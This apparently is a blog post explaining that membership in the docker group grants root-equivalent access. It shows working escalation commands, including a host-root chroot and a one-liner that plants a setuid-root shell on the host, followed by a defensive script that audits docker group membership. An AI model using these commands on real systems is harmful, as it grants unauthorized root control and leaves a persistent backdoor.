Docker group security
Most Docker quick start guides give you a trick on how to use it without typing sudo every time.
Is it handy? Sure. Is it safe? …
$ sudo gpasswd -a $USER docker
What happened when you typed that in your terminal?
Well, as expected, it added the current user to the docker group.
Docker honours that change: it allows any user in that group (along with the root user) to run every available docker command.
The catch is that you always have root privileges inside containers, so if you can link the host machine to the container, you effectively have unrestricted root access to the host.
And Docker provides exactly such a link: volumes.
So… Do you want root access on your computer, without having to sudo?
$ docker run -ti -v /:/host debian chroot /host
Do you want a root shell that you can use at any time?
$ docker run -v /:/host -t debian /bin/sh -c 'cp /bin/sh /host/bin/power-sh && chown root.root /host/bin/power-sh && chmod a+s /host/bin/power-sh'
$ power-sh
$ whoami
root
I hope you don’t need any other examples ~
TL;DR: anyone in the docker group effectively has unlimited, unrestricted root access.
But don't be alarmed; it's not a bug, it's a feature.
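As an added example (not part of the original post), here is a small POSIX shell audit a host administrator can run to see who holds that root-equivalent access: it lists the members of the docker group and flags any of them who are not also in the sudo or wheel group, since docker membership should be granted exactly as deliberately as sudo. The group file contents below are constructed; the functions take a file path so you can point them at /etc/group on a real host.

```shell
#!/bin/sh
# Added audit helper, not code from the original post.
# Reads a group(5)-format file (name:password:gid:member1,member2,...)
# and reports who can reach the Docker daemon through the docker group.

# Print the members of the docker group, space separated.
docker_group_members() {
    awk -F: '$1 == "docker" { gsub(",", " ", $4); print $4 }' "$1"
}

# Print docker group members who are NOT in the sudo or wheel group.
# These accounts have root-equivalent access without ever appearing in
# the usual admin groups, which is what an auditor wants to catch.
docker_not_in_sudo() {
    awk -F: '
        $1 == "docker" { n = split($4, d, ",") }
        $1 == "sudo" || $1 == "wheel" {
            m = split($4, s, ",")
            for (i = 1; i <= m; i++) admin[s[i]] = 1
        }
        END {
            for (i = 1; i <= n; i++)
                if (d[i] != "" && !(d[i] in admin)) print d[i]
        }
    ' "$1"
}

# Human-readable report for one group file.
audit_report() {
    members=$(docker_group_members "$1")
    if [ -z "$members" ]; then
        echo "docker group has no members"
        return 0
    fi
    echo "docker group members (root-equivalent): $members"
    unexpected=$(docker_not_in_sudo "$1")
    if [ -n "$unexpected" ]; then
        echo "WARNING: in docker but not in sudo/wheel: $unexpected"
    fi
}

# Constructed sample standing in for /etc/group (alice is a sudoer, bob is not).
SAMPLE_GROUP=$(mktemp)
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:alice
docker:x:999:alice,bob
users:x:100:
EOF

audit_report "$SAMPLE_GROUP"
rm -f "$SAMPLE_GROUP"
```

Run it as `sh audit-docker-group.sh`; on a real host replace the sample file with `/etc/group`. The report is only as good as the group file, so also keep an eye on the ownership of the Docker socket, which is what the docker group actually grants access to.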